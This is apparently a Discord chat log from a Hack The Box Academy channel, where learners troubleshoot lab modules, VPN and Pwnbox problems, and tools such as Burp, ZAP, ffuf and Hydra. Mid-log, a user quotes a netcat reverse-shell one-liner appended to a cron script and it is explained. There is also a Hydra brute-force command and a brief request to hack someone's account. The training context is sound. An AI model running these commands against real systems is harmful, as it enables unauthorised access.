#modules

1 messages ยท Page 507 of 1

west canopy
#

@grand locust DM me bro ๐Ÿ™‚

#

@muted kite if you need help with FFuF module let me know!

muted kite
#

Sure when is the best time for you? I'm currently trying to upgrade my vb right now

#

I'll just shoot a question when I have one

upper vault
#

Hi all, quick question. Anyone else have issues using proxychains?

livid pier
#

the module? which part?

upper vault
#

Hi. Module "Using web proxies", section "Proxying tools" proxychains doesn't really seem necessary specifically, besides being shown as a useful tool, so i've been experimenting with it for the last couple of hours.

livid pier
upper vault
#

specifically, using 'proxychains curl <whatever.com>' will return what you ask of it, provided the proxylist in '/etc/proxychains4.conf' is present and has 'some kind' of valid ip in the proxy table, but traffic does not seem to route through that proxy at all, and basically just runs a curl

livid pier
#

that part?

upper vault
#

ya ive already figured out that 'https' is not a valid schema for the config

#

it only accepts http, socks4, socks5 and raw

#

i happen to be using ZAP, but it catches 'curl <whatever.com> --proxy localhost:8080' no problem

#

so its not a matter of curl through proxy, but a matter that proxychains refuses to forward through the localhost at 8080

#

also tried install, uninstall, restart after config changes, running as sudo, praying for rain, peeing on my shoes. etc

livid pier
#

you can see the curl run through zap tho right?

upper vault
#

only when running curl --proxy by itself, but not with proxychains

livid pier
#

I think that is what it is useful for. So if i run metasploit through the proxy I can see what metasploit is sending and recieving in burp or zap

upper vault
#

right. Zap catches whatever i send to it, so the problem is specifically with proxychains and how its handling traffic. doesn't really seem to be much info after googling for an hour or so, so I'm guessing proxychains just doesn't want to cooperate for whatever reason

#

/rank

#

huh that was weird

livid pier
upper vault
#

'$ curl ifconfig.me/ip --proxy localhost:8080' -- curls and returns info, but shows traffic in ZAP

livid pier
#

zap is just monitoring the localhost 8080 right?

upper vault
#

yup

#

guess i should also mention works fine with firefox, foxyproxy, etc

livid pier
#

hmm not sure

upper vault
#

also should mention i've tried 'proxychains' and 'proxychains4', as well as saving the .conf file with different editors, using different .conf configurations

#

Ya, long shot, I've basically tried almost everything, its really a nothing problem, I'll probably never use it even if it did work, but the fact that it wouldn't has been driving me crazy since lunch

#

I appreciate all the help though.

livid pier
#

ya sorry I couldnt be more helpful, I only thought about using it to reroute stuff through burp and zap

#

I havent used it since the module tho either

upper vault
#

I've seen how it can be really quick and useful for quickly routing stuff, and multichaining it with other services and proxies, so it seems like cool stuff. Lol ya i figured if it did work it would've at most been 'oh thats neat' then i wouldve forgotten about it immediately

#

I used apt to get it, I might try using different builds from the git repo

livid pier
#

Anyone around to answer a cross site scripting question?

muted kite
#

you appear to be correct, it's going through the wordlist I think 87,649

#

I was going to leave it til tomorrow, but I know I would have forgotten what you told me unless I do it now

#

what does COOBS mean precious?

livid pier
#

cubes?

#

stonks?

muted kite
#

oh it's zero cubes for the exercise

livid pier
#

lol its the principle of the matter

muted kite
#

but the knowledge I definetly need to know

#

So I receive output, but that still doesnt give me the answer to the question? HTB sure is filled with riddles

mellow shadow
#

WHO PING

coarse mango
#

hey can anyone help me with this question

#

"Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, unzip the file, and run "hasher upload_nix.txt" from the command line. Submit the generated hash as your answer."

#

Linux File transfer methods section of File Transfers

#

I uploaded the file to the machine and ssh'd into the box but there is no unzip command on the machine. is that intentional?

livid pier
#

What if you unzip it on your machine, transfer it then run the command?

coarse mango
#

i tried that but it says incorrect when i submit it

#

i got it had to use another zip command

livid pier
safe token
#

hey. im in the web attacks module at the bypassing encoded references section and i kinda stuck. i should URI decode some thing which i'd want to do in the console but so far i haven't found a command for that. pls help

muted kite
#

you bunch of mother FUZZers!\

#

which web attack module? which question and answer?

#

im just now doing ffuf, very slowly

sly nebula
#

Any news on new modules? It's been a month without courses so far.

muted kite
#

why have you completed them all?

#

I need a full time mentor to help me through all of them and it appears your just in time!

#

@sly nebula

#

๐Ÿ˜›

#

im just kidding of course

quartz hollow
#

Hi all, I'm doing the "Using Web Proxies" module and on the ZAP Scanner question it says that I should get a high level vulnerability which I should use to read the flag but I'm only seeing medium alerts. I'm using the built-in browser of ZAP. Can anyone pls give me a hint? am I missing something?

lost pecan
#

Can anyone tell me about how long it takes to populate the CPEs list once you've completed a module or 2?

agile oriole
#

Hello together, I have big troubles with the performance of the academy machines. Very often my VPN crashes (every 2min) and reconnect, but the machines are a long time not reachable. This sucks hard. Is this normal and this with an VIP account?

#

Yesterday, It was actually not possible to work with the academic modul. VPN was connected, but the machines was nearly not reachable over hours...

untold kiln
dusty timber
agile oriole
untold kiln
#

are you using a VM and is the network set to NAT, then try in BRIDGE mode, that can also help a lot.

agile oriole
dusty timber
#

๐Ÿคฆโ€โ™‚๏ธ

muted kite
#

if your using linux also, make sure it's updated and upgraded

agile oriole
muted kite
#

what kind of connection issue, whats your setup?

#

vm or regular OS?

#

kali linux?

agile oriole
#

Its a Win10 with virtualbox on NAT mode. VM is a Kali

#

I actually cannot set a bridge mode, how an other member described. Virtualbox shows no options for an adapter. Seems an steady problem with solutions, but I could not fix it yet, to try this

#

and it works fine with the normal HTB platform, without so big problems. Its a problem with the academy

dusty timber
muted kite
#

there is a dropdown that has about 5 network categories

#

can you upload a screenshot?

agile oriole
muted kite
muted kite
#

reinstall a new kali linux using that link as your guide

#

@agile oriole

dusty timber
muted kite
#

show a screenshot

dusty timber
muted kite
#

click next until you see one

#

@dusty timber

dusty timber
#

working on it ๐Ÿ™‚

muted kite
#

they are not in each page

dusty timber
#

ah, going from module page 1, brb

muted kite
#

did you find it sh333p?

dusty timber
#

Ok yea found a page with download new VPN key, now im trying to install it on the pwnbox

muted kite
#

Im not sure about that one

#

I think you just use it on your actual OS

dusty timber
#

But im not using a vpn to connect to the academy?

#

I mean with pwnbox it should all be on their side right?

muted kite
#

yeah pawnbox should be fine alone

#

but dont take my word for it

dusty timber
#

Thanks for your help though

muted kite
#

yeah, I didnt realize you were using pawnbox until now

#

your not using a virtual machine than

dusty timber
#

No no

muted kite
#

there are many people who claim pawnbox gives them no issues, I am not one of them.

dusty timber
#

It was working without no problems for me for two days, now it wont work at all lol

muted kite
#

what changed?

#

two days ago

#

are you a windows user?

dusty timber
#

I changed from one course to another, thats the only thing ive done except for following along in the sections

#

Yea I use windows

#

Ok, it seems to be fixed for me. The difference I see now, when I spawn a target it doesnt show the ports like it does in my screenshot above, only the address (as it should I guess)

#

So support guy did something, not sure what but it looks like he managed to solve it

#

What a relief, thanks again for helping out @muted kite

muted kite
#

sure sounds like I just kept you distracted while the tech guy worked

dusty timber
#

he didnt respond for a long time so I thought he had gone home ๐Ÿ˜‚

muted kite
#

Well now we all know tech support does work

dusty timber
dusty timber
#

And its broken again, something is definitely up lol. This time ill wait in the support chat :p

agile oriole
muted kite
#

got a new vpn key and all that?

#

sometimes it just all comes together

#

another happy customer...

rare aspen
#

i am having this problem where my machine is still running

#

how can i deactivate it

#

any ideas

#

??

muted kite
#

I mean logout and log back in

rare aspen
muted kite
#

reboot

#

VM?

rare aspen
#

i got disconnected temporarily

muted kite
#

are you on a virtual machine?

rare aspen
#

nope

#

i use my kali

#

on pc

muted kite
#

so how are you connecting to starting point?

#

your vpn

#

did you download a vpn key

rare aspen
#

the vpn is disconnected but still its showing active

rare aspen
muted kite
#

what does the terminal say?

#

type ifconfig tun0

#

'ifconfig tun0'

#

does it show the vpn ip address in inet?

rare aspen
#

nope its not showing

muted kite
#

than its not connected

#

the platform is missreading

#

what are you trying to do

rare aspen
#

i downloaded it at first connented my vm then got disconnected

#

now its not reading any inpys

#

inputs*

muted kite
#

you must run the vpn from your terminal before you start the machine

#

sudo openvpn starting_point_ovpn

rare aspen
muted kite
#

or whatever the name is, once it's connected, than you start the machine

#

show me your ovpn file

#

in a picture

#

go to your terminal

wary pebble
#

push connect to htb-.choise sever-> download openvpn config-> in terminal open vpn 'name file'

muted kite
#

thanks meshokkonoply

#

I didnt realize he didnt have it downloaded until now

wary pebble
#

In terminal command: openvpn 'name of downloaded file' and run

rare aspen
#

ok

sick portal
#

Anyone know if there's a known issue with the web apps module and the HTML injection question? It tells you to write HTML to make a link say Click Me. It's easy, I tested it on the server, but when I put it in as the answer it gives me the middle finger.

wary pebble
#

next on website HTB push button connect to HTB

muted kite
#

<img> ?

sick portal
#

That for me?

muted kite
#

yeah

wary pebble
#

yes

sick portal
#

Stand by

muted kite
#

it wants something simple like that I think

rare aspen
#

yes all done but finally getting a last error

sick portal
rare aspen
wary pebble
#

push on button spawn machine

#

stop.

rare aspen
#

but it's the same machine which i'm trying to stop

wary pebble
#

IZROTH what are download?

sick portal
#

I got it, it was dead set on me using www in there. Picky syntax...:-D

wary pebble
#

i mean file for machines or for starting point?

rare aspen
wary pebble
#

hmm

rare aspen
#

initialization sequence completed

wary pebble
#

I think you need restart website

#

*reload

fluid river
#

Hi, I am having some trouble with footprint lab-hard, I have found the private key, but I am having whet try to sue it.

dull sleet
rare aspen
wary pebble
#

and?

dull sleet
#

ohh

#

i havent done that

#

lol wait this is the modules section of course XD

#

sorry

muted kite
rare aspen
muted kite
#

your vpn is connected now you must spawn the machine

#

leave that tab open so long as you spawn the machine

rare aspen
muted kite
#

the machine is loaded, try to work on it now

rare aspen
#

the target it not showing

#

*ip

muted kite
#

not sure what you mean by that

rare aspen
#

i got temporarily disconnected i was doing my tasks but as soon as the connection went off the access to teh lab paused i can no longer acces the lab

muted kite
#

it says your connected to htb and it also says your machine is spawned

#

click starting point

#

in green

rare aspen
#

but i lost the previous machine

muted kite
#

the machine doesnt matter

#

each machine gives the same results

#

reload

rare aspen
muted kite
#

gimme asec

#

im in linux now

#

let me see how I was doing it

rare aspen
#

ok

livid pier
#

anyone around to offer guidance on the last footprinting problem?

summer root
#

I'm having trouble using powerview in the AD module and could use a hand, think I'm missing something pretty simple here but not sure what

quaint igloo
#

any tips on Login as the user with the id 5 to get the flag?

#

Im hardstuck

quaint igloo
#

Using comments

livid pier
#

im looking one sec

carmine quail
#

Anyone around to answer a question on the Linux Priv Escalation module?

livid pier
open lantern
#

++verify

little whaleBOT
#

Please see your DMs for instructions on how to verify your HTB account.

livid pier
fluid river
rose crest
#

I am stuck for a while now in the Web attacks - Skills Assesment. I found the first step. I understand what I need to do next, but don't know how to achieve that. Can anyone help me?

upper vault
#

Anyone else get tickled when their target machine starts running out the clock, and you manage to figure out whatever with only a couple minutes to go? xD good stuff

woeful oxide
#

Hey Guys

#

Iโ€™m really stuck on the FFUF module

#

Is someone out there that have finished it willing to help me?

#

Pls

upper vault
#

@woeful oxide sry m8 haven't done it yet

slow bluff
#

linux priv esc module > Cron Job Abuse > "find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null" can someone explain me why we are using -path /proc, and why proc directory Thanks.

muted kite
#

I will try and help you, once I've completed it

unique valve
#

Hey, Just a quick update that is worth noting. We have recently updated to an improved version of Pwnbox. With that is one change you may want to know about regarding using sudo and running commands as root. You will need to use the password that is located in the credentials file on the desktop. This gets autogenerated when you hit start instance.

muted kite
upper vault
#

Wondered where those desktop credentials came from, thought I'd just been overlooking them

unique valve
#

Ya we upgraded Pwnbox. Its similar to the one that runs on the main HTB site now.

rustic sage
#

any IT?

upper vault
#

is it a thing that most target boxes on the vpn block icmp requests?

acoustic owl
summer root
#

I need a sanity check for one of the powershell LDAP enum module questions if anyone's got a sec, feel like I'm answering everything it's asking for the filter but nothing's really turning up

bitter bear
#

Hi all. Just starting with the Academy. I've hit my first roadblock with Burpsuite. Once I enable Burp in Firefox in the Pwnbox, I enter the generated target IP/Port. Burp doesn't get anything in the repeater after forwarding. I'm following the instructions verbatim. Have there been other problems with this recently?

livid pier
#

right click and send to repeater

bitter bear
#

I know I hit Ctrl+R like the tutorial said, and that didn't do anything. I'll try with the right click when I get back to it.

livid pier
muted kite
#

Burpsuite gives me lots of issues @livid pier

livid pier
#

zap looks like it give some abilities that burp doesnt have with the free version so I try to use it

livid pier
muted kite
#

Like webpage is not viewable with intercept on. Gotta turn proxy off or it doesn't work

#

Issues with decode

#

I probably need a full course on it

upper vault
#

@muted kite I've been banging my head against the wall this past week on the webproxy section, it's hit and miss sometimes between burp and some of the tools you're supposed to use. Just found out zap doesnt have ascii encoding as a processor function in the fuzzer. mfh

livid pier
#

Sometimes I get the burpsuite cant load this but i think that is a connection to htb erver error, I have never really used the decode feature

upper vault
#

@livid pier Besides the one persistent file, our pwnboxes aren't persistent right? I know I've gotten update reminders every time ive started it so maybe its just a software issue

#

*burp update reminders

muted kite
#

In one of the modules you have to use decode to find the flag

#

Web proxies are slow

livid pier
livid pier
#

super annoying before I knew what the problem was, I thought I was doing something wrong, but I would enter the same code on the pwnbox and it would work

muted kite
#

Kali Linux is different. It has so many problems with functionality, it's powerful and over usefull

#

Can't use pawnbox to hack evil Corp can we now?

livid pier
muted kite
#

I think backtrack was better

livid pier
muted kite
#

Kali is fully loaded with apps and tools

livid pier
#

When im done with academy Im going to try to spend an hour or 2 with a new tool each day

muted kite
#

Technically Kali has over 600

#

Apps

livid pier
#

thats 6x as crazy

summer root
#

@livid pier @bitter bear that's because the browser's failsafe is tripping since burp's a mediator between your client and server but not trusted at that time since you haven't downloaded burp's cert and uploaded it into the browser's trusted certs. You aren't getting the error on pwnbox because htb staff have the cert already plugged in on bootup

#

I can try and find the url for the cert

#

Or better yet find a tutorial on adding it

muted kite
#

Is there a link that shows how to do that?

summer root
#

I'll find one

muted kite
#

thanks

#

that would be GREAT

summer root
#

Not as hard of a process as I made it sound

#

Yep

#

If you'd also want my advice if you're starting out on htb, buy a month of vip to get access to retired boxes and watch ippsec's walk-throughs on YouTube. Best part is he explains where he stumbles and why what works works/vice versa

#

@muted kite @bitter bear ^^^

muted kite
#

Thank you, I've added it to my favorites

summer root
#

yep

livid pier
#

The process for adding it is in one of the modules too

summer root
#

Also did not mean to ping you my man lmao

#

sry about that

#

myeh whatevs

#

@livid pier @muted kite @bitter bear feel free to DM if yall have questions about burp

summer root
#

yuh

muted kite
#

i will homes

livid pier
#

In the web proxy module - proxy setup it has step by step instructions too

dusty timber
muted kite
#

Umm, yea

livid pier
#

how have i not seen this before?!!>==?

warm sable
#

hello I need your help I need to hack an account who can help write to yandex.direct

warm sable
#

maybe

#

sorry

unreal flume
#

Anyone got any idea why I can't upgrade the tty?

main vapor
#

@unreal flume You are using zsh if I am not mistaken?

#

If so, the trick is to run these two commands as the following:

stty raw -echo; fg
#

Otherwise this upgrading trick won't behave as you would expect it on bash.

unreal flume
#

Thank you very much ill give it a shot

#

wow thank you it worked

#

you're a genius

main vapor
plush pilot
#

attacking web applications with ffuf, but my pwnbox shows that ffuf: command not found?

plush pilot
main vapor
#

Look at your desktop, there is a text file with credentials, use the password you find in there.

plush pilot
rustic sage
# plush pilot

the password is also displayed in the URL - which can come handy

stoic vessel
#

hello, can anyone help with this.

#

i keep getting this only for all commands i am trying

#

Its active subdomain enumeration section in Information gathering module.

unreal flume
#

are passwords for a user stored in id_rsa?

#

I am on a module and dont really understand ssh keys

carmine quail
#

or is it a general connection question?

unreal flume
#

but I figured it out now

#

@carmine quail well my id_rsa is saying invalid format when tryna ssh into root

carmine quail
#

glad to see you figured it out - let us know if you need any other help

unreal flume
carmine quail
#

weird - I can't say I've run into that one. I've seen one that says your permissions are wrong, but not that the key is an invalid format

unreal flume
#

I did have the permissions one but I done chmod 600 id_rsa and it solved that one

carmine quail
#

ok, but usually it needs to be 0400 - I think...

unreal flume
#

oh lemme try that

#

What do the numbers even mean? @carmine quail it didnt explain

#

and yea still says invalid format

silent lintel
#

hey I am stuck on the "live engagement" of the shells module. I know i am executing the right exploit but the payload is not executing and i think it might be an internal error or something. i can explain more details but didnt want to use any spoilers or anything

livid pier
silent lintel
livid pier
#

Well i have been putting off finishing that shells module, I will start it now and let you know if I can get any of those shells to work

silent lintel
#

awesome thanks man ill keep plugging away and see if i can get it to work

flat patrol
#

Good morning my brothers and sisters. I am stuck. It happens, but I tried and I tried and I can't quite make it.

Login Brute Forcing Skills Assessment Website question #2

I am looking for a flag using Hydra.

My user is -l user

My password file rockyou-10

Running http-post-form on the admin_login.php page.

user&pass is what I found in burpsuite.

So user=user&pass=^PASS^

Then the delimiter

:F=200 (not 404 not found)

No luck cracking the password...

Now if I do mistype there will be a list of honeypot illegitimate passwords listed, 16 I think.

If anyone has any insight please reply to my message or DM me. Much love to all of you today, enjoy your weekend.

#

hydra -l user -P rockyou-10.txt -F 127.0.0.1 -s 33000 http-post-form "/admin_login.php:user=user&pass=^PASS^:F=200"

#

Example.

#

Of my most hopeful failed attempt.

#

(๏ฝกล๏นล)

livid pier
#

Goodluck

#

I will have to go back to that soon

flat patrol
# livid pier I will have to go back to that soon

Yeah... If I can skip this and try the service login page and come back to this later I will. If I'm successful with the service login I will definitely let you know see if I can guide you to the right direction, but that's to be determined of course.

livid pier
honest flower
#

hi guys.

#

Is there someone that can explain me this command i met in the htb academy module "getting started"?

silent lintel
honest flower
#

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

#

is used to start a reverse shell

#

i can't understand the beginning and the end

#

all the stuff around the tmp folder

silent lintel
#

so that is a one liner to start a reverse shell as you said. it removes anything in /tmp/f if it exists then makes a FIFO (first in first out) file in the tmp/f folder then it pipes what is in the /tmp/f folder to /bin/sh which is essentially bash and redirects standard output and error (2>&1) to netcat of your ip so your computer through netcat can see the output and error of commands

#

anyone correct me if i said anything wrong please^

livid pier
#

what does tee do?

honest flower
#

so why i have to create a piped name with mkfifo and redirect to nc?

silent lintel
#

it takes the input of one command and outputs to a file and to the screen output

honest flower
#

is not enough just to use the nc part?

livid pier
#

Thank you!

honest flower
#

i've tried upload just the nc part but the beaveour is quite strange!

silent lintel
#

that is a good question, i am not 100% but i think it is to run commands through a file in the tmp folder where you have permissions so you use netcat to write to the file and then use the file to execute commands

#

i might be wrong so dont take that as gospel but i think thats why

rose peak
#

Hi

honest flower
#

mmm... i don't know

rose peak
#

why i can't send message in genral channel?

livid pier
#

Have you verified?

rose peak
#

*yeh

#

well, what's problem ?

honest flower
livid pier
rose peak
silent lintel
honest flower
#

๐Ÿ™‚

silent lintel
livid pier
#

insufferable

silent lintel
#

tell me about it lol...its unusable almost

little whaleBOT
#

Please see your DMs for instructions on how to verify your HTB account.

rose peak
#

hey, why I got 1020 error when I get into hackthebox website? :_)

livid pier
#

were you trying to ddos the site?

rocky cosmos
#

Hi, I know this question has been asked several times, but I can't get firefox to work at all on my workstation; it won't connect to anything. I tried changing the proxy settings, but nothing I do has worked. I'm really new to the academy and am stuck on the burp introduction.

livid pier
#

DO you have a paid account?

rocky cosmos
#

I have the free account

livid pier
#

you dont get internet access on the free acount

rocky cosmos
#

So it'd be impossible to do the task without a subscription?

rose peak
livid pier
#

If you are trying to connect to a box within the network you should be able to connect

rose peak
#

I'm from Iran, is it boycott for Iranian?

flat patrol
#

It should go back to the default State and hopefully it'll work for you again.

rocky cosmos
silent lintel
livid pier
#

did you try the metasploit and the manual upload with msvenom?

uneven wedge
#

Hi, I am stuck at the "Attacking Web Applications with Ffuf " Modul - Skill assesment. I trie to find the page with says "'You don't have access!'". But when I run a recursive scan I get 1000 of results and I dont know how to properly filter them cause they all have the same size etc. A tip would be greatly appreciated. Thanks in advance ๐Ÿ™‚

livid pier
#

if the most prevalent size was 1000 you would -fs 1000

uneven wedge
#

y but they all have the same size

livid pier
#

hmm

livid pier
livid pier
#

I walmost went crazy

silent lintel
livid pier
#

Should we use that ip? when i ifconfig it says our ip is 172.17.0.1

#

But its impossible to expermient because it freezes after every keystroke

slender cosmos
#

Do you need to switch network configuration to install ftp, etc in the Starting Point Pwnbox? I can't reach the repos to install them

livid pier
#

It should have everything you need

slender cosmos
#

oof, its saying that ftp isnt installed. Tried multiple boxes

livid pier
#

hmm they just updated the pwnbox maybe they forgot something

slender cosmos
#

command is just ftp right? Like 'ftp -h'

livid pier
#

ya

slender cosmos
#

"bash: ftp: command not found"

#

welp

livid pier
#

I would recommend getting kali

#

I have found pwnbox to be a nightmare

slender cosmos
#

yea i think ill have to

#

plus only 2hr/month is kinda a yike

opaque elm
#

Sorry to bother you but where is vpn key in module , it is gone ??? I would like to connect my VM with

summer root
#

I agree for pwnbox

#

it's nice starting out but you'll find pretty quick it's missing a lot of stuff/isn't updated the further you jump in, but still v nice

opaque elm
#

It's slow and copy/paste doesn't work....

livid pier
#

The copy paste not working kills me

slender cosmos
#

it works you just have to ctrl + shift + v

#

but yea im switching to kali now lol

livid pier
#

I found a good guide to download the virutal machine and install kali if you want

west canopy
#

I'm also part of the "Can't copy and paste into Pwnbox" club ๐Ÿ˜ฆ

livid pier
#

It pains me

west canopy
#

K A L I B O Y S

opaque elm
opaque elm
slender cosmos
#

To connect to the 'victim' machine? yea i will

opaque elm
livid pier
slender cosmos
#

I havent set it up yet but I think the walk through for meow shows you how

livid pier
#

To do it with kali, top right it sas connect to HTB, then click starting point, then open vpn

#

download that file, then run sudo openvpn startingpointfile.opvn

opaque elm
#

I did it

acoustic owl
opaque elm
#

It works, thanks !

spring saffron
#

Hi all - Supernoob beginner here so apologies for the simple question...

#

I'm doing the Learning Linux fundamentals course on the accadamy (which is great) but i'm running into a brick wall. I'm using the pwnbox to follow through with commands which works generally OK however when i use sudo it's asking for a password... For the life of me, i don't know what that could be..

livid pier
#

its also in the url

dusty timber
#

The password is written above the vm window on your right pane, also on the desktop of your kali in a document

livid pier
#

my_credentials

spring saffron
#

Ahh doh.. Thank you.. that worked.

#

Legends

summer root
#

I could use some help with the final question for bloodhound fundamentals

dull bear
#

Ive e got a question with academy

#

For students, is there anyway they can buy the student package

#

and get access to tier 3 modules?

#

Like priv esc?

livid pier
#

I am planning on paying for one month $68 for 1000 cubes

#

doesnt make sense to buy 1000 cubes for $100 when I can get 1000 for $68

#

Im also poor tho

#

The real question is tell me why on the web attacks module the question says search the first 20 people for the flag and the 21st person has the flag. wtf mate?

#

or maybe 0 doesnt count

dull bear
livid pier
#

ya $38 for 500

#

thats $76 for 1000

vestal spruce
#

Anyone know why the accesschk command isn't available on the target box that I'm working on?

#

Nvm

sand falcon
#

does anyone know how to reslove this issue?

candid sandal
#

Hi, I have a question regarding the web proxy module

#

Copy paste of image doesn't work here ?

#

Anyway, in the skill assessment questions, 3rd question, we have found decoded the cookie that a web page gives us, and know we understand that this 31 bits cookie is a 32 bits MD5 hash missing one character that would need to find using the fuzzer

#
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
languid dawn
#

what's your question?

candid sandal
#

I'm trying to think about the right way to explain it

#

Euhm

#

I understand how to do it, and I understand that the result will be a list of cookie (one for each combination)

#

but what should I do with that ? How can I come to know which character was the missing one

languid dawn
#

well yes and no, you'll only have one full cookie that will let you access the page

#

do you know what "fuzzing" means?

candid sandal
#

Oh, that will log me in as an admin ?

#

I believe so

languid dawn
#

you're fuzzing the last character of that cookie so it's a proper md5 hash

#

in other words, you can see the hash as a 32 character long password, and you only have the 31 first chars, what would you do?

candid sandal
#

to send it in the post request ?

languid dawn
#

yeah that would work, or generally just try to interact with the server using the newly created cookie

candid sandal
#

I'm not sure I got it

#

So the purpose is just to interact with the server (so let's say send a get request) with the new cookie that we find from the 32 bits hash ?

#

and once the right cookie is sent to the server, I will be authenticated as the admin ?

languid dawn
#

yes but you can only find the proper cookie by sending it to the server, for example a page that requires to be logged on

candid sandal
#

alright

languid dawn
#

if the cookie is incorrect you usually get a forbidden and/or a redirect

#

so if you just get the page, that means you have the proper cookie

#

and yes as it's the admin's cookie you would be admin

candid sandal
#

So, if I understand correctly, along with my attempts to send a get request with the cookie, I'll either get an error, or the admin page ? Those are the only two possible outcomes ?

#

I feel like when I tried that, I just got as a result the same login page as the response

#

But I'll try again, maybe I did something wrong

languid dawn
#

that should be correct.

candid sandal
#

Alright it worked, thank you very much

zenith grove
#

Is anyone else experiencing problems with the sql injection module, second paragraph (SQL Statements)? I just finished the previous question and it worked fine. After spawning the new target in the IP isn't pingable, neither responding to my attempt to connect with mySQL. Google is pinging.

rustic sage
blissful glen
#

Can someone explain to me how to locate the flag.txt in the public exploits module? I have attempted to Nmap to my target machine and when searching for exploits in Metasploit I can see an exploit for the simple back up plug in on the site; I run it after setting RHOSTS and RPORT but get a general directory with no real access

zenith grove
flat patrol
#

Thanks

unique valve
west canopy
#

@sand falcon That's a weird one. Your command syntax looks correct... wish I had a better answer for you lol.

sand falcon
#

i have no idea what's happening here

drifting knoll
#

@sand falcon pls be careful with spoilers, i have to remove your screenshots

sand falcon
drifting knoll
sand falcon
#

so i got the flag alrady

#

i want to clarify why it does not work with crackmapexec

rustic sage
#

ั€ะตะฑัั‚, ั‚ัƒั‚ ะตัั‚ัŒ ั€ัƒััะบะธะต?

sand falcon
#

ะะตั‚

rustic sage
#

ะพะพะพะพะพะพะพ ะฝะฐัˆ

#

ัƒั€ะฐ

drifting knoll
rustic sage
#

ok

sand falcon
#

sure. @drifting knoll

#

so can you explain why it happens? because i though cme would be a great tool. but now i have conflict

#

can i DM to you @drifting knoll

drifting knoll
sand falcon
#

woh that's great idea. letme check

tough quarry
#

Stuck on firewall evasion also for a week now. I found two open ports but the versions displayed aren't the correct ones. The search continues.

west canopy
#

@tough quarry DM me brother

sand falcon
drifting knoll
#

We want to remind all of you of the rules regarding PMs and that they are for good reasons.

We want to support you all and help you learn quickly and a lot. However, the hundreds of PMs a day slow us down because contacting a staff member without permission is for technical emergencies (related to the modules in this channel) only. We always pay attention to that. In addition, as developers of the modules, besides supporting you, we also work on new modules, develop VMs, improve the concepts and try to make it as close to reality as possible for you, which requires focus and high concentration. Therefore, pinging or PMing is a distraction and delays the development process, and as a result, you will have to wait longer for new content.

If you ask a question here or get stuck, communicate with each other and help each other out. Teamwork is essential in this area and requires practice which you will get from it. If we developers don't respond to your questions, it doesn't mean that we ignore you, but rather it's a reminder to read through the content again, try to understand the concepts and functionality, and look for ways to solve the tasks. In real situations where you will face similar challenges, it is crucial to learn to deal with these situations and to be able to research for them because no one will give you the solution in that real case. Again, this skill can only be learned through practice in which you develop your own problem-solving methodology.

Therefore we ask you not to contact us for no reason but only in technical emergencies or with explicit permission. Don't take away each other's experience but help each other to train the analytical skills to develop new ideas that will help you in the future.

wispy night
#

Good evening, I would need help with the "getting started" module, I am at the public exploits and I am asked to find the services running on the server so for that I do an nmap -sC - sV -Pn <ip target>, which gives me a port used by nginx. At this point I don't know how to find the exploit, the clue is: search for plugin exploits, except I don't know how to search or refine my search

livid pier
#

you can use searchsploit or google

#

searchsploit is a command line

acoustic owl
random gulch
wispy night
acoustic owl
raw crest
#

helo bro, I want to ask how to run http.server command in linux? I've been looking for the command to not produce results in my linux, is there a solution?

livid pier
#

8000 would be the port

raw crest
livid pier
#

what error do you get when you run it?

raw crest
#

python3: can't open file '/home/cyber4rd/Documents/HTB/Archetype/http.server': [Errno 2] No such file or directory

raw crest
livid pier
hushed osprey
#

your are doing something wrong - probably trying to open file with that name based on error you pasted

#

python3 -m http.server 8000 <-- this must work for you without sudo since its unprivileged port

raw crest
livid pier
#

Looking at the path it doesnt look like it should be there

livid pier
livid pier
hushed osprey
#

if you mispelled module name it would throw different error (No module named <name>) so you must ommit something from commands above

raw crest
#

ok bro I understand, thank you once again for the solution

bright stream
#

Is there some obvious reason I'm missing that pwnbox can't seem to install ftp using apt-get install?

livid pier
bright stream
#

@livid pier That's it. So it looks like I'm paying for the service or using OpenVPN then, yeah?

livid pier
#

I would use virtualbox-kali-openvpn

#

thats all free

carmine quail
#

I'm stuck on the Linux Priv Esc final section if anybody is around that can help me out. I have Flag2 and Flag4... but I can't seem to get Flag1. Any push in the right direction would be helpful.

compact compass
#

Hello everyone, regarding the Meow exercise, I've obtained the hash or flag.txt info...But when entering into text box on HTB, it shows incorrect flag!?

compact compass
#

nvm 'HTB{}' was necessary

lethal atlas
#

Can someone give me a hint on the skills assessment of Sqlmap Essentials? I have scoured the site and caught the blind reference but I cant find any parameters to attack.

lime breach
#

hello

burnt stone
#

Hello how can we help?

rustic sage
#

Hi

rustic sage
#

anybody who can help?

languid dawn
#

Just find an 0-day and you're good to go (edit: let it be clear that this is a joke as your question was way too vague)

drifting knoll
languid dawn
#

Also please read #rules, we do not entertain illegal activities

#

If your question is about getting started with android hacking you'll find many resources in #resources-tools

#

Also in #binex-rev and htb has a couple challenges for android

drifting knoll
acoustic zenith
#

anyone around who can give me a tipp for Skills Assessment - File Inclusion/Directory Traversal module ? I'm fishing still in the dark

rustic sage
#

hi, can someone help me ? i'm about to buy cubes on academy htb and i want to know if i buy monthly plan, do i will still have lifetime acces to modules that i bough ?

acoustic zenith
#

maybe use the chat on the page for this answer

polar pond
#

hey just wondering, are there any plans on making cloud pentesting modules?

polar pond
#

oh snap awesome! any eta or is it too early to say?

drifting knoll
polar pond
steel flume
#

One of the suggested tools doesn't exist anymore. Unsure how to figure out how to replace it

#

It's the module getting started

livid pier
#

Anyone to asnwer a question on web attacks- advanced file disclosures? - nvm I got it

vale geyser
#

Has someone finished Value Fuzzing in FFUF Web Attacks?

vale geyser
#

what wordlist did you use?

livid pier
#

I dont remember, did you try that?

lethal atlas
#

Anyone here that can help me with sqlmap essentials? Stuck on the final skills asssesment.

lethal atlas
hollow hearth
#

Hello everyone, could you guide me on how I could face the solution of an SQLi exercise, if this is not the channel where I can consult, it tells me.

barren summit
stiff tiger
livid pier
stiff tiger
#

I had a problem with hydra and googled "hydra false positives" - top entry mentioned " Also sometimes due to high number of threads the page doesn't have time to load giving you false positives always try to decrease thread count." - not sure everything is believable on the great internet...

summer lake
#

anyone knows how we can reset the academy module back to 0?

twin raft
#

